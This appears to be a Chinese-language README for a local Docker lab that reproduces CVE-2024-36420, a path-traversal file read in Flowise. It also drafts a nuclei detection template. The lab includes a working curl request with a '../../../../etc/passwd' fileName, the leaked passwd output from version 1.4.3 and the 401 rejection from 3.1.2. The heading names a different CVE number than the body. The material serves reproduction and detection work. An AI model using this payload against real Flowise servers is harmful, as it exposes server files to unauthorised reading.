
CVE-2024-10829 analysis
针对影响 Flowise 的 CVE-2024-36420 的本地复现实验室和 nuclei 模板草稿。
CVE-2024-36420 是 Flowise 中的一个任意文件读取漏洞,由对以下端点的 fileName 请求体参数的不安全使用导致:
POST /api/v1/openai-assistants-file该实验室用于验证:
flowiseai/flowise:1.4.3)flowiseai/flowise:3.1.2)docker-compose.ymldocker-compose.latest.ymlCVE-2024-36420.yaml启动 Flowise 1.4.3:
docker compose down -v
docker compose up -d
docker compose logs --tail=100 flowise
手动验证:
curl -i \
-X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
-H 'Content-Type: application/json' \
-d '{"fileName":"../../../../etc/passwd"}'
观察到的易受攻击响应:
HTTP/1.1 200 OK
Content-Disposition: attachment; filename=passwd
...
root:x:0:0:root:/root:/bin/ash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...
启动较新的 Flowise 3.1.2:
docker compose -f docker-compose.latest.yml down -v
docker compose -f docker-compose.latest.yml up -d
docker compose -f docker-compose.latest.yml logs --tail=100 flowise
手动验证:
curl -i \
-X POST http://127.0.0.1:3000/api/v1/openai-assistants-file \
-H 'Content-Type: application/json' \
-d '{"fileName":"../../../../etc/passwd"}'
观察到的新版本响应:
HTTP/1.1 401 Unauthorized
{"error":"Unauthorized Access"}
验证模板:
nuclei -duc -validate -t CVE-2024-36420.yaml
对易受攻击目标运行:
nuclei -duc -u http://127.0.0.1:3000 -t CVE-2024-36420.yaml
预期行为:
1.4.3:匹配3.1.2:不匹配1.4.3 上易受攻击3.1.2 上被拒绝访问